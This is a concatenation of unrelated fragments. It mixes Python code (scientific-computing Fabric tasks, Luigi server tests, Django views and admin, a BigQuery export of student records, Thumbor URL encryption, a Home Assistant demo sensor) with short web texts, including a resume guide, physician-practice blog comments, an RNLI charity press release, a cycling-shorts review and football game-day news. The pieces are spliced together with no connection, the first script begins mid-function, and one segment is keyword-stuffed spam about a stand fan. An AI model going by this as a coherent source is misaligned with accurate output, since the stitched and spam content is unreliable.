job(dict(script='lammps',
cores=4, wall_time='0:15:0',memory='2G'),args)
#@task
#def lammps_swelling_test(config, **args):
"""Submits a set of LAMMPS jobs to the remote queue, as part of a clay swelling test."""
#let's first try to run the exfoliated one.
#lammps_in_file =
#with_config(config)
#execute(put_configs,config)
#loop over swelling values
#update_environment(dict(job_results, job_config_path))
#job(dict(script='lammps',
#cores=4, wall_time='0:15:0',memory='2G'),args)
### IBI ###
@task
def do_ibi(number, outdir, pressure=1, config_name="peg", copy="yes", ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot,'python')):
""" Copy the obtained output to a work directory, do an IBI iteration and make a new config file from the resulting data. """
ibi_in_dir = os.path.join(env.localroot,'results',outdir)
ibi_out_dir = os.path.join(env.localroot,'output_blackbox',os.path.basename(ibi_script),outdir)
local("mkdir -p %s" % (ibi_out_dir))
# if copy=="yes":
# blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',outdir), os.path.join(env.localroot,'python'), int(number)))
blackbox(ibi_script, "%s %s %s %s %s" % (atom_dir, number, pressure, ibi_in_dir, ibi_out_dir))
if copy=="yes":
blackbox("prepare_lammps_config.sh", "%s %s %s %d %s" % (ibi_out_dir, os.path.join(env.localroot,'config_files'), config_name, int(number)+1, atom_dir))
@task
def ibi_analysis_multi(start_iter, num_iters, outdir_prefix, outdir_suffix, ibi_script="ibi.sh", pressure=1, atom_dir=os.path.join(env.localroot,'python')):
""" Recreate IBI analysis results based on the output files provided.
Example use: fab hector ibi_analysis_multi:start_iter=7,num_iters=3,outdir_prefix=peg_,outdir_suffix=_hector_32 """
si = int(start_iter)
ni = int(num_iters)
for i in xrange(si,si+ni):
outdir = "%s%d%s" % (outdir_prefix,i,outdir_suffix)
do_ibi(i, outdir, pressure, outdir_prefix, "no", ibi_script, atom_dir)
# ibi_in_dir = os.path.join(env.localroot,'results',outdir)
# ibi_out_dir = os.path.join(env.localroot,'ibi_output',outdir)
# local("mkdir -p %s" % (ibi_out_dir))
# blackbox("copy_lammps_results.sh", "%s %s %d" % (os.path.join(env.localroot,'results',"%s%d%s" % (outdir_prefix,i,outdir_suffix)), os.path.join(env.localroot,'python'), i))
# blackbox(ibi_script, "%s %s %s %s" % (i, pressure, ibi_in_dir, ibi_out_dir))
@task
def full_ibi(config, number, outdir, config_name, pressure=0.3, ibi_script="ibi.sh", atom_dir=os.path.join(env.localroot,'python'), **args):
""" Performs both do_ibi and runs lammps with the newly created config file.
Example use: fab hector full_ibi:config=2peg4,number=3,outdir=2peg3_hector_32,config_name=2peg,cores=32,wall_time=3:0:0 """
do_ibi(number, outdir, pressure, config_name, "yes", ibi_script, atom_dir)
lammps(config, **args)
wait_complete()
fetch_results(regex="*%s*" % (config_name))
@task
def full_ibi_multi(start_iter, num_iters, config_name, outdir_suffix, pressure=0.3, script="ibi.sh", atom_dir=os.path.join(env.localroot,'python'), **args):
""" Do multiple IBI iterations in one command.
Example use: fab hector full_ibi_multi:start_iter=7,num_iters=3,config_name=2peg,outdir_suffix=_hector_32,cores=32,wall_time=3:0:0 """
si = int(start_iter)
ni = int(num_iters)
pressure_changed = 0
for i in xrange(si,si+ni):
full_ibi("%s%d" % (config_name,i+1), i, "%s%d%s" % (config_name,i,outdir_suffix), config_name, pressure, script, atom_dir, **args)
p_ave, p_std = lammps_get_pressure(os.path.join(env.localroot,"results","%s%d%s" % (config_name,i,outdir_suffix)), i)
print "Average pressure is now", p_ave, "after iteration", i, "completed."
#if(i >= 10 and p_ave < p_std):
# if pressure_changed == 0:
# pressure = float(pressure)/3.0
# pressure_changed = 1
# print "(FabMD:) Pressure factor now set to", pressure, "after iteration", i
# if abs(p_ave) - (p_std*0.5) < 0: # We have converged, let's not waste further CPU cycles!
# print "(FabMD:) Pressure has converged. OPTIMIZATION COMPLETE"
# break
### Utitility Functions
def lammps_get_pressure(log_dir,number):
steps = []
pressures = []
LIST_IN = open(os.path.join(log_dir, "new_CG.prod%d.log" % (number)), 'r')
for line in LIST_IN:
NewRow = (line.strip()).split()
if len(NewRow) > 0:
if NewRow[0] == "Press":
pressures.append(float(NewRow[2]))
d1 = np.array(pressures[5:])
print "READ: new_CG.prod%d.log" % (number)
return np.average(d1), np.std(d1) #average and stdev
|
The few, the proud, the ones I didn't delete.
Architecture is probably my favorite thing to take pictures of. These are a bunch of photos I don't really have a purpose for but that I still love. |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import multiprocessing
import random
import signal
import time
import tempfile
from helpers import unittest, with_config
import luigi.rpc
import luigi.server
from luigi.scheduler import CentralPlannerScheduler
from tornado.testing import AsyncHTTPTestCase
class ServerTestBase(AsyncHTTPTestCase):
def get_app(self):
return luigi.server.app(CentralPlannerScheduler())
def setUp(self):
super(ServerTestBase, self).setUp()
self._old_fetch = luigi.rpc.RemoteScheduler._fetch
def _fetch(obj, url, body, *args, **kwargs):
response = self.fetch(url, body=body, method='POST')
if response.code >= 400:
raise luigi.rpc.RPCError(
'Errror when connecting to remote scheduler'
)
return response.body.decode('utf-8')
luigi.rpc.RemoteScheduler._fetch = _fetch
def tearDown(self):
super(ServerTestBase, self).tearDown()
luigi.rpc.RemoteScheduler._fetch = self._old_fetch
class ServerTest(ServerTestBase):
def test_visualizer(self):
page = self.fetch('/').body
self.assertTrue(page.find(b'<title>') != -1)
def _test_404(self, path):
response = self.fetch(path)
self.assertEqual(response.code, 404)
def test_404(self):
self._test_404('/foo')
def test_api_404(self):
self._test_404('/api/foo')
class ServerTestRun(unittest.TestCase):
"""Test to start and stop the server in a more "standard" way
"""
def run_server(self):
luigi.server.run(api_port=self._api_port, address='127.0.0.1')
def start_server(self):
self._api_port = random.randint(1024, 9999)
self._process = multiprocessing.Process(target=self.run_server)
self._process.start()
time.sleep(0.1) # wait for server to start
self.sch = luigi.rpc.RemoteScheduler(host='localhost', port=self._api_port)
self.sch._wait = lambda: None
def stop_server(self):
self._process.terminate()
self._process.join(1)
if self._process.is_alive():
os.kill(self._process.pid, signal.SIGKILL)
def setUp(self):
state_path = tempfile.mktemp(suffix=self.id())
luigi.configuration.get_config().set('scheduler', 'state_path', state_path)
self.start_server()
def tearDown(self):
self.stop_server()
def test_ping(self):
self.sch.ping(worker='xyz')
def test_raw_ping(self):
self.sch._request('/api/ping', {'worker': 'xyz'})
def test_raw_ping_extended(self):
self.sch._request('/api/ping', {'worker': 'xyz', 'foo': 'bar'})
def test_404(self):
with self.assertRaises(luigi.rpc.RPCError):
self.sch._request('/api/fdsfds', {'dummy': 1})
def test_save_state(self):
self.sch.add_task('X', 'B', deps=('A',))
self.sch.add_task('X', 'A')
self.assertEqual(self.sch.get_work('X')['task_id'], 'A')
self.stop_server()
self.start_server()
work = self.sch.get_work('X')['running_tasks'][0]
self.assertEqual(work['task_id'], 'A')
if __name__ == '__main__':
unittest.main()
|
Published 04/20/2019 10:57:43 am at 04/20/2019 10:57:43 am in Lasko 18 Stand Fan With Remote Control.
lasko 18 stand fan with remote control 18 oscillating stand fan with remote control black holmes lasko 1854 18 inch oscillating stand fan with remote control.
lasko 18 stand fan with remote control black amazon,lasko 18 stand fan with remote control,lasko 18 stand fan with remote control black,lasko 1854 18-inch oscillating stand fan with remote control,holmes 18 stand fan with remote control - black, amazoncom lasko stand fan with cyclone grill tan computers lasko quot stand fan with cyclone grill ,lasko stand fan with remote control black walmartcom lasko stand fan with remote control black, lasko stand fan oscillating remote control pedestal fan lasko lasko stand fan stand fan up amazon reviews lasko stand fan with remote control , lasko stand fan stand fan with remote control black shop in lasko stand fan stand fan with remote control black shop in speed oscillation stand, lasko pedestal fan with remote control previous next lasko lasko pedestal fan with remote control previous next lasko remote control cyclone pedestal fan inch black lasko remote control , lasko stand speed fan model s black with remote lasko stand speed fan model s black with remote. |
def contact_form(request):
if request.method == 'POST':
form = ContactForm(request.POST)
if form.is_valid():
name = form.cleaned_data['name']
mail = form.cleaned_data['mail']
subject = "[Verleihsystem:Kontakt]: "+form.cleaned_data['subject']
message = form.cleaned_data['message']
cc_myself = form.cleaned_data['cc_myself']
recipients = [getattr(settings, 'CONTACT_FORM_EMAIL', '')]
if cc_myself:
recipients.append(mail)
email = EmailMessage(subject=subject, body=message,
to=recipients, headers={'Reply-To': mail})
email.send()
return redirect(reverse('home'))
else:
if request.user.is_anonymous():
form = ContactForm()
else:
name = "%s %s" % (request.user.first_name, request.user.last_name)
mail = request.user.email
form = ContactForm(initial={'name': name, 'mail': mail})
return render_to_response('contact/contact_form.html', {'form': form,},
context_instance=RequestContext(request))
|
Will a prospective employer be motivated to learn more about you from reading your resume? Resumes are important tools for communicating your purpose and capabilities to employers. A resume advertises your qualifications to prospective employers and is your calling card for getting interviews. You can craft your resume by understanding the different types, construction elements, and refinements necessary to make it your effective first impression to employers.
The chronological resume lists your jobs in reverse chronological order with a description of what you did in each job. It shows the progression of your skills and experience with each assignment.
The functional resume describes your core competencies and the functions you can perform. It focuses on what you can do outside the context of specific jobs you’ve held.
The combination resume is a hybrid that combines your functional expertise with your work history. It typically doesn’t go back as far as a chronological resume, just highlighting your last two or three assignments.
For most transitioning military, we recommend the combination format because it highlights your functional expertise and also shows your most recent assignments.
Contact Information – Who you are/how to contact you – your name, address, phone number and email address. You may also want to include your Linkedin profile’s url.
I want a _(position/job)_ where I will use my _(skills/abilities)_, which will result in _(outcomes/benefits)_.
A position in data analysis where skills in mathematics, computer programming, and deductive reasoning will contribute to new systems development.
Experience – What you can do – your patterns of skills and accomplishments.
Work History – What you have done – your job titles and activities performed.
Education – What you have learned – your education and training/degrees and certifications.
On the Assess Your Skills & Interests Step, you identified your work-content skills and functional skills. Use the exercises you completed to communicate your experience, work history, and education to employers in your resume.
Other categories may be included but should be limited to only those relevant to your job search, such as professional affiliations, special skills not covered in other sections of your resume, or awards and special recognition. Samples of resumes that can be downloaded and used as a template are found in Additional Resources to the right. The examples represent a broad cross-section of the types of jobs that most transitioning military service members would likely seek. These are Microsoft Word documents that you can upload and modify to suit your needs, or just use as a reference. If you have multiple career interests you will want to develop a resume for each.
Resume Critiquing –Does your resume accurately present your qualifications in the best possible light so that the hiring managers will want to call you in for an interview? That is the true test of an effective resume!
Internal Evaluation: Review the Resume Do's and Don'ts infographic to make sure your resume conforms to these rules.
External Evaluation: Circulate your resume to three or more individuals whom you believe will give you objective and useful feedback (avoid people who tend to flatter you). Ask that they critique your draft resume and suggest improvements in form and content. The best evaluator would be someone in a hiring position similar to one you will encounter in the actual interview. Not only will you get useful feedback, but it will spread the word that you are job hunting and could lead to an interview!
Letters play a key role in a job search and come in several forms, including cover letters, approach letters, and thank you letters. Samples of each type of letter can be found in Additional Resources to the right.
Persuade the reader of your benefit or value.
Convince the reader with factual evidence.
Move the reader to acquire the product.
State your interest and reason for writing.
Highlight your possible value to the employer.
State that you will call the individual at a particular time to se if an interview can be scheduled.
Approach letters are written for the purpose of developing job contacts, leads, or information. These letters help you gain access to the hidden job market by making networking contacts that lead to those all-important informational interviews. State your purpose, but do not suggest that you are asking for a job – only career advice or information. Request a meeting and indicate you will call to schedule it at a mutually convenient time.
Construct your resume. Use the sample resumes below to assist you in writing your resume.
Write your job search letters. Use the sample letters below to assist you in writing various types of job search letters. |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PaperCitation'
db.create_table(u'common_papercitation', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('slug', self.gf('django.db.models.fields.CharField')(unique=True, max_length=128)),
('inline_citation', self.gf('django.db.models.fields.CharField')(max_length=128, blank=True)),
('authors', self.gf('django.db.models.fields.TextField')(blank=True)),
('title', self.gf('django.db.models.fields.TextField')(blank=True)),
('journal', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'common', ['PaperCitation'])
def backwards(self, orm):
# Deleting model 'PaperCitation'
db.delete_table(u'common_papercitation')
models = {
u'common.papercitation': {
'Meta': {'object_name': 'PaperCitation'},
'authors': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inline_citation': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'journal': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'title': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['common'] |
The ACP Advocate Blog: "You say you want a revolution, well you know, we’d all like to see the plan"
The thing about myths is that there is some grain of truth in them.
I recently obtained a book from the Medical Group Managers Association (MGMA) with survey results for costs of primary care practices. They broke up each primary care specialty into non-hospital or Integrated Delivery System (IDS) owned (Independent) and hospital or IDS owned groups. The sad part is that there were inadequate numbers of surveys for the independent internal medicine practices to even have the category in the book. They only had 9 surveys completed and 10 were required. Using independent family practice as a surrogate for independent internal medicine, it was easily determined that independent general internists can not generated enough income from Medicare office visits to even cover overhead. Hospital or IDS owned practices using provider based billing were easily able to cover overhead and make a little extra income from Medicare office visits.
As a result of this unfair billing system, about 90% of outpatient general internists are now employed by hospitals or IDS’s. Because good primary care loses revenue for their employer, I have witnessed insane office schedules forced on the internists so they literally do not have the time to practice good primary care.
In an ACO, the incentive is to reduce costs compared to previous years of spending and projected spending. The resultant “savings” is then shared with the ACO. In this scenario, good primary care is then valued and supported.
So according to the Mythbusters…the 2 myths are plausible, it just not known if the government intended it to happen or if they were just didn’t care.
Adding to Jay’s thought I have always considered physicians to have a 30 year working life compared to a 40 year working life for the general public.
Additionally doctors are saddled with a horrendous student debt, a topic in itself. My personal feeling is schools have a desire to capture some of their students above average income long after they have graduated.
Moving forward doctors have to pay for their debt, care for their family, educate their children and provide for their retirement on a shortened work cycle.
We have to change the system.
I don't doubt that there is a trend to larger practices, and that hospital owned practices are becoming more common. I also don't question the ecpnomic struggles of physicians in smaller independent practices. The point of my blog post is that these trends, which were occuring long before Obamacare became law and continue today, are not by government intent or design to eliminate indepenedent practices--that is the myth part--but a consequence of market forces that have been buffeting small practices for a long time. ACOs and PCMHs offer the potential of helping physician owned practices by opening up funding and revenue--care coordination payments, shared savings--in addition to their usual FFS reimburesment. And Medicare's decision to select mostly physician owned practices for the ACO initiative, rather than hospital owned ones, suggests to me that at least some in government are betting that dcotors who own their own groups will do better than hospitals in increasing access and controlling cost.
Thank you Bob, for quoting two organizations that have less than zero combined credibility in the minds of independent physicians - the AMA and CMS.
While I agree that the loss of independent IM practices started before Obamacare, this process will rapidly accelerate after the advent of ACOs. The myth that these organizations selected by CMS are "physician-led" is the biggest one you conveniently hide. You also forget what Dr. Emmanuel himself admitted in the now infamous article in the Annals a while ago....that disappearance of private practice of medicine was an inevitable outcome of Obamacare.
I meant to say that about 90% of Montana general internists are hospital or IDS employed. 4 years ago it was about 60%. The market forces you commented on are more accutely felt in a rural environment. Intended or not, the average small group or solo practitioners who don't have lucrative ancillary services like diagnostic imaging can not generate enough income from Medicare office visits to cover practice expenses. So as the percentage of Medicare patients in an internist practice goes up, practice viability goes down. At some point the physician faces the options of leaving practice, becoming a hospitalist, or joining a hospital group.
You are correct that this is not due to the Affordable Care Act. This pernicious problem has been present for years. Because of provider based billing, hospitals (which already consume the lion's share of health care dollars)are given even more money from Medicare A if they employ physicians. Also hospital employed physicians tend to have their labs, referrals, and diagnostic imaging stay with in the hospital system, capturing that revenue also.
This link is part of a series on the situation in Pittsburgh, one that I find happening in my community and seen in other parts of the country as a business model and eliminating competition takes precedent to medical care. |
# Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from datetime import datetime
from django import forms
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
from models import CustomUser, Announcement
class CustomUserCreationForm(UserCreationForm):
username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^\w+$',
help_text = _("Required. 30 characters or fewer. Alphanumeric characters only (letters, digits and underscores)."),
error_message = _("This value must contain only letters, numbers and underscores."))
password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password confirmation"), widget=forms.PasswordInput)
email = forms.EmailField(label=_('Email'))
class Meta:
model = CustomUser
fields = ("username", "email")
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
list_display = ('username', 'email', 'first_name', 'last_name', 'is_staff',
'is_superuser', 'last_ip', 'partner')
search_fields = ('username', 'first_name', 'last_name', 'email', 'id')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'email', 'password1', 'password2')}
),
)
class AnnouncementAdmin(admin.ModelAdmin):
formfield_overrides = {
models.CharField: {'widget': widgets.AdminTextareaWidget}
}
list_display = ('content', 'created', 'visible')
actions = ['make_hidden']
def get_form(self, request, obj=None, **kwargs):
form = super(AnnouncementAdmin, self).get_form(request, obj=None, **kwargs)
default_help_text = form.base_fields['created'].help_text
now = datetime.now()
form.base_fields['created'].help_text = default_help_text+\
u'</br>Current server time is %s. Value is saved without timezone converting.' % now.strftime('%m/%d/%Y %H:%M:%S')
return form
def visible(self, obj):
return not obj.hidden
visible.boolean = True
def make_hidden(self, request, queryset):
Announcement.clear_cache()
queryset.update(hidden=True)
make_hidden.short_description = _(u'Hide')
admin.site.register(Announcement, AnnouncementAdmin)
admin.site.unregister(User)
admin.site.register(CustomUser, CustomUserAdmin)
|
The perils of our much loved coastline will be brought to life next week, at the launch of London’s newest drinking destination – The Bottle, boasting the UK’s largest range of hand-sourced bottled water, all of it straight from the sea.
Pop-up bar The Bottle is being opened next week (Thursday 8 - Saturday 10 September) at Pop Brixton to promote the Royal National Lifeboat Institution’s (RNLI) H2Only fundraising challenge, as well as the courage (‘bottle’) of the charity’s volunteer lifeboat crews. The Bottle will showcase 10 different regional varietals of sea water, and every bottle tells a story of a well-loved British or Irish coastal location, and how its water can kill.
Each looks refreshing at first glance but the description and tasting notes highlight the dangerous and often life threatening potential contained inside. All of the water has been sourced from popular shorelines the length and breadth of the UK and Ireland - the same water the RNLI’s volunteer lifeboat crew members save lives from every day, with 7,973 people rescued last year.
Of course, the bottled sea water won’t actually be available to drink. Instead, free bottles of mineral water will be handed out to help people kick start their commitment to stay on the water to help the RNLI stay on the water. Sign up to the challenge at h2only.org.uk and give up the drinks you love for 10 days to raise vital funds for the RNLI.
“It’s a striking way to catch the eye of young Londoners and interest them in the challenge,” explained Neil Withers, Thames Operations Manager at the RNLI. “It’s also a way for us to showcase the bottle – the courage – of our volunteer lifeboat crew members who brave extreme conditions day-in day-out and rescue an average 22 people per day.
The H2Only challenge runs from Tuesday 13 September to Friday 23 September. For more information, or to sign-up to take on the H2Only challenge, visit h2only.org.uk.
Please contact the H2Only press team at [email protected] / 020 7025 6613 for further information and images. |
# -*- coding: utf-8 -*-
import sys
import csv
import datetime
from google.cloud import bigquery
if __name__ == '__main__':
client = bigquery.Client()
query = (
'SELECT * '
'FROM `mcourser-mexico-he.events.events2017*` '
'WHERE SUBSTR(username,0,3) IN ("DUR","JAL")'
'AND LENGTH(username) > 9')
query_results = client.run_sync_query(query)
query_results.use_legacy_sql = False
query_results.run()
if query_results.complete:
with open('datos_bigquery.csv', 'wb') as csvfile:
writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
writer.writerow(['random_event_id','created_date','event_type','session_type','user_id',
'username','firstname','lastname','user_role','user_school_id','user_school_name',
'lesson_id','lesson_title','lesson_type','course_id','course_title','course_lessons_count',
'course_ebooks_count','chapter_id','chapter_title','assignment_id','group_assignment_id',
'assignment_grade','assignment_state','assignment_due_date','score','errors_count',
'checks_count','mistake_count','session_duration','request_country_code','request_region',
'request_city','request_citylatlon','user_agent','mlibro_system_version','mlibro_version',
'mlibro_type','mlibro_GUID','mlibro_language','user_email','user_first_name_adult',
'user_last_name_adult','user_email_adult','user_age_type','user_regulation_agreement',
'user_regulation_marketing','user_regulation_information','user_school_national_id',
'user_school_type','user_school_city','user_school_zip_code','user_school_province',
'user_school_country','user_school_email'])
for row in query_results.rows:
result = []
for elem in row:
if type(elem) == unicode:
result.append(elem.encode('utf-8'))
elif type(elem) == datetime.datetime:
result.append(elem.strftime('%Y-%m-%d %H:%M:%S UTC'))
elif type(elem) == int:
result.append(elem)
elif elem == None:
result.append('')
else:
result.append(elem)
writer.writerow(result)
elif query_results.errors:
print(str(query_results.errors))
sys.exit(1)
|
Sadie Plant was born in Birmingham and studied at the University of Manchester, where she gained her PhD in Philosophy in 1989. She has been a Lecturer in Cultural Studies at the University of Birmingham and a Research Fellow in the Department of Philosophy at the University of Warwick before leaving the academic world to work independently and write full-time. She is the author of The Most Radical Gesture: The Situationist International in a Postmodern Age (1992), Zeros and Ones: Digital Women and the New Technoculture (1997), and Writing on Drugs (2001). |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com [email protected]
import base64
import hashlib
import hmac
from Crypto.Cipher import AES
from .url import Url
from six import text_type, PY3, b, PY2
class Cryptor(object):
def __init__(self, security_key):
self.security_key = (security_key * 16)[:16]
def encrypt(self,
width,
height,
smart,
adaptive,
full,
fit_in,
flip_horizontal,
flip_vertical,
halign,
valign,
trim,
crop_left,
crop_top,
crop_right,
crop_bottom,
filters,
image):
generated_url = Url.generate_options(
width=width,
height=height,
smart=smart,
meta=False,
adaptive=adaptive,
full=full,
fit_in=fit_in,
horizontal_flip=flip_horizontal,
vertical_flip=flip_vertical,
halign=halign,
valign=valign,
trim=trim,
crop_left=crop_left,
crop_top=crop_top,
crop_right=crop_right,
crop_bottom=crop_bottom,
filters=filters
)
url = "%s/%s" % (generated_url, hashlib.md5(b(image)).hexdigest())
pad = lambda s: s + (16 - len(s) % 16) * "{"
cipher = AES.new(self.security_key)
if PY2:
url = url.encode('utf-8')
encrypted = base64.urlsafe_b64encode(cipher.encrypt(pad(url)))
return encrypted
def get_options(self, encrypted_url_part, image_url):
try:
opt = self.decrypt(encrypted_url_part)
except ValueError:
opt = None
if not opt and not self.security_key and self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:
security_key = self.storage.get_crypto(image_url)
if security_key is not None:
cr = Cryptor(security_key)
try:
opt = cr.decrypt(encrypted_url_part)
except ValueError:
opt = None
if opt is None:
return None
image_hash = opt and opt.get('image_hash')
image_hash = image_hash[1:] if image_hash and image_hash.startswith('/') else image_hash
path_hash = hashlib.md5(image_url.encode('utf-8')).hexdigest()
if not image_hash or image_hash != path_hash:
return None
opt['image'] = image_url
opt['hash'] = opt['image_hash']
del opt['image_hash']
return opt
def decrypt(self, encrypted):
cipher = AES.new(self.security_key)
try:
debased = base64.urlsafe_b64decode(encrypted.encode("utf-8"))
decrypted = cipher.decrypt(debased)
if PY3:
decrypted = decrypted.decode('ascii')
decrypted = decrypted.rstrip('{')
except TypeError:
return None
result = Url.parse_decrypted('/%s' % decrypted)
result['image_hash'] = result['image']
del result['image']
return result
class Signer:
def __init__(self, security_key):
if isinstance(security_key, text_type):
security_key = security_key.encode('utf-8')
self.security_key = security_key
def validate(self, actual_signature, url):
url_signature = self.signature(url)
return url_signature == actual_signature
def signature(self, url):
return base64.urlsafe_b64encode(hmac.new(self.security_key, text_type(url).encode('utf-8'), hashlib.sha1).digest())
|
For years, I’ve been lamenting the fact that despite searching in every cycling shop I visited, I was unable to find a pair of women’s shorts with a water resistant seat (back). My husband had purchased a pair a long time ago and it always frustrated me that when we were out biking together on those wet and muddy days, I was soon soaked to the skin while he stayed relatively dry.
I was under no illusion that wearing a pair of water resistant backed shorts would keep me bone dry, but I was hoping to stay more comfortable for longer when conditions were soggy. One consideration had been a pair of full waterproof shorts/trousers which I came across a year or two ago, but they just felt too heavy and uncomfortable – plus I expected that I would overheat wearing them in Autumn/Spring.
The day I came across the Madison Flo DWR shorts in 18 Bikes brought a big smile to my face. Finally, a manufacturer had concentrated on technical kit for women to ride their mountain bikes comfortably throughout the year. I have to admit that I love Madison cycling clothing (everything I’ve bought so far has performed well and been super comfortable to wear), so it took very little to persuade me to purchase.
Armed with my new shorts, I headed up to Scotland in October for a few days playing around on the trails at Glentress. I expected cool, wet conditions with plenty of opportunity to fully test my new purchase. What I actually found was one of the warmest weeks of the year. The waterproof backed shorts were too warm for the conditions and ended up relegated to my bag for the entire trip.
The next few weeks were relatively mild and dry with little opportunity for some proper technical testing – ironically, for once, I wanted muddy, wet conditions. Eventually, my wish came true and after a day mountain biking through some huge puddles in Swaledale, I finally got to test my new shorts in anger.
The large waterproof rear panel was great for delaying water seepage and I was glad that it covered more than just the immediate seat area. Thumbs up Madison for considering that – they are a step up from the ones my husband has been wearing all this time!
The bagginess in the shorts stops them from feeling restrictive and I love how they look off the bike. Combined with the stretch in the front panel (which is DWR fabric), they’re a really comfortable short to wear. However, the bagginess does also mean that they sometimes feel like they’re flapping around while cycling – admittedly I’ve not worn them with knee pads yet (I suspect the extra volume would then be welcome).
The legs have extra venting with zips opening to mesh (although I haven’t felt the need to use them so far) and there is plenty of storage in the zipped pockets.
18 Bikes displaying my jacket & shorts colour coordination!
There’s very little that I would alter about these shorts. If I was being really picky, then perhaps they’re a little low at the back, meaning that they rode down a tiny bit while leaning forward on my bike. However, that is being really picky and tightening the Velcro more at the waist minimised the movement. It’s certainly not something that would stop me from purchasing the shorts.
If you’re in the market for a pair of waterproof backed shorts, definitely check them out. At RRP £69.99 they’re not the cheapest pair of shorts I’ve ever bought, but I honestly think they will be the best value for money I spend on cycling kit this winter.
Oh, and the orange (red chilli) zips match the colour of my Madison Flux Softshell jacket perfectly – bonus! |
"""
Demo platform that has a couple of fake sensors.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.const import (
ATTR_BATTERY_LEVEL, TEMP_CELSIUS, DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE)
from homeassistant.helpers.entity import Entity
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Demo sensors."""
add_entities([
DemoSensor('Outside Temperature', 15.6, DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS, 12),
DemoSensor('Outside Humidity', 54, DEVICE_CLASS_HUMIDITY, '%', None),
])
class DemoSensor(Entity):
"""Representation of a Demo sensor."""
def __init__(self, name, state, device_class,
unit_of_measurement, battery):
"""Initialize the sensor."""
self._name = name
self._state = state
self._device_class = device_class
self._unit_of_measurement = unit_of_measurement
self._battery = battery
@property
def should_poll(self):
"""No polling needed for a demo sensor."""
return False
@property
def device_class(self):
"""Return the device class of the sensor."""
return self._device_class
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._unit_of_measurement
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._battery:
return {
ATTR_BATTERY_LEVEL: self._battery,
}
|
Georgia Tech continues to improve the football game day experience for Yellow Jacket fans.
There are several pieces of news and notes for Saturday’s game against Presbyterian (7 p.m.).
Tim Hanchey, who has served as public address announcer for the Atlanta Falcons and the Chick-fil-A Bowl, will make his debut at Bobby Dodd Stadium Saturday night. Hanchey is filling in for longtime P.A. announcer John Pendergast, who is taking the season off.
Saturday’s game vs. Presbyterian is Youth Day. An groups or teams can take advantage of a special group rate of $8 per ticket. Call the ticket office at 1-888-TECH-TIX for more information.
Beginning Friday, Atlantic Station and Georgia Tech will launch a series of Friday Night Fan Fests – tailgate-style celebrations, food and fun for Georgia Tech students, alumni and fans. Friday Night Fan Fests coincide with seven home football weekends and will be free to the public.
Events begin at 7 p.m. in Central Park with live music, the Yellow Jacket Marching Band, the Georgia Tech spirit squad, Tech merchandise, Buzz the mascot and the Ramblin’ Wreck.
Fans can take advantage of a complimentary game day shuttle service between Atlantic Station and Bobby Dodd Stadium. Fans can park at Atlantic Station, avoid the traffic to campus and enjoy a meal and shopping before or after the game at any of the restaurants and establishments on-site.
Come to Fowler Street on campus 2.5 hours before kickoff of all home game to enjoy expanded activities for the entire family. New this year: live bands will play on Callaway Plaza prior to the start of each game. Saturday, “The Geeks” will go on stage at 4 p.m. Additionally, more inflatables, face painters, concessions and interactive promotions are planned for the entire family.
The Brock Family Indoor Practice Facility, the indoor practice facility for Yellow Jacket football, will be open to the public Saturday from 4-6 p.m. To view the facility, enter the building off Cherry Street, on the northwest side of the building.
